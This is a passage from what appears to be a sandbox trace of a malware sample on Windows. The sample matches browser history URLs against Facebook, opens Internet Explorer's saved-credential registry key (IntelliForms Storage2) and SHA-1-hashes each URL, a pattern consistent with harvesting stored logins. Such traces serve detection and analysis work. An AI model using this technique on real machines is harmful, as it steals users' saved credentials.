_String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned 1 [0085.948] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned 1 [0085.994] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned 1 [0085.995] wcscmp (_String1="http://www.facebook.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned 1 [0085.995] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x28a940 | out: phkResult=0x28a940*=0x0) returned 0x2 [0085.995] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0085.995] GetProcAddress (hModule=0x764f0000, lpProcName="CryptAcquireContextA") returned 0x764f91dd [0085.995] GetProcAddress (hModule=0x764f0000, lpProcName="CryptReleaseContext") returned 0x764fe124 [0085.995] GetProcAddress (hModule=0x764f0000, lpProcName="CryptCreateHash") returned 0x764fdf4e [0085.995] GetProcAddress (hModule=0x764f0000, lpProcName="CryptGetHashParam") returned 0x764fdf7e [0085.995] GetProcAddress (hModule=0x764f0000, lpProcName="CryptHashData") returned 0x764fdf36 [0085.995] GetProcAddress (hModule=0x764f0000, lpProcName="CryptDestroyHash") returned 0x764fdf66 [0085.995] CryptAcquireContextA (in: phProv=0x28b968, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x28b968*=0x58eb10) returned 1 [0086.012] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 0x44 [0086.012] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.012] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 0x44 [0086.012] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.012] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.012] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.012] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 0x44 [0086.012] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.012] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png/") returned 0x45 [0086.013] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.013] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.013] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 0x68 [0086.013] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 0x68 [0086.013] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd2, dwFlags=0x0) returned 1 [0086.013] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.013] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 0x68 [0086.013] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp/") returned 0x69 [0086.013] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd4, dwFlags=0x0) returned 1 [0086.013] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.013] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 0x3a [0086.013] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 0x3a [0086.013] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.013] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.013] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 0x3a [0086.013] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv/") returned 0x3b [0086.013] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.013] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.013] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 0x5e [0086.013] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 0x5e [0086.013] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xbe, dwFlags=0x0) returned 1 [0086.013] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.013] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 0x5e [0086.013] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc/") returned 0x5f [0086.013] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0086.013] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.013] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.013] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 0x7d [0086.014] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 0x7d [0086.014] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xfc, dwFlags=0x0) returned 1 [0086.014] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.014] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 0x7d [0086.014] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif/") returned 0x7e [0086.014] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xfe, dwFlags=0x0) returned 1 [0086.014] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.014] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 0x3a [0086.014] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 0x3a [0086.014] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.014] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.014] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 0x3a [0086.014] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv/") returned 0x3b [0086.014] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.014] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.014] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 0x62 [0086.014] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 0x62 [0086.014] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc6, dwFlags=0x0) returned 1 [0086.014] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.014] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 0x62 [0086.014] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls/") returned 0x63 [0086.014] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xc8, dwFlags=0x0) returned 1 [0086.014] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.014] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 0x48 [0086.014] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.014] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 0x48 [0086.014] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x92, dwFlags=0x0) returned 1 [0086.014] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.015] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 0x48 [0086.015] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt/") returned 0x49 [0086.015] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x94, dwFlags=0x0) returned 1 [0086.015] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.015] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 0x69 [0086.015] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 0x69 [0086.015] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd4, dwFlags=0x0) returned 1 [0086.015] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.015] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 0x69 [0086.015] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png/") returned 0x6a [0086.015] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd6, dwFlags=0x0) returned 1 [0086.015] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.015] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 0x40 [0086.015] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 0x40 [0086.015] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.015] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.015] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 0x40 [0086.015] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx/") returned 0x41 [0086.015] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.015] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.015] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 0x5b [0086.015] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 0x5b [0086.015] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb8, dwFlags=0x0) returned 1 [0086.015] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.015] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.015] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 0x5b [0086.015] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots/") returned 0x5c [0086.016] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xba, dwFlags=0x0) returned 1 [0086.016] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.016] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 0x3e [0086.016] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 0x3e [0086.016] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.016] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.016] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 0x3e [0086.016] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots/") returned 0x3f [0086.016] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.016] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.016] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 0x35 [0086.016] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 0x35 [0086.016] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0086.016] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.016] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 0x35 [0086.016] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv/") returned 0x36 [0086.016] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0086.016] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.016] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 0x39 [0086.016] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 0x39 [0086.016] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x74, dwFlags=0x0) returned 1 [0086.016] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.016] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 0x39 [0086.016] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.016] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png/") returned 0x3a [0086.016] CryptHashData 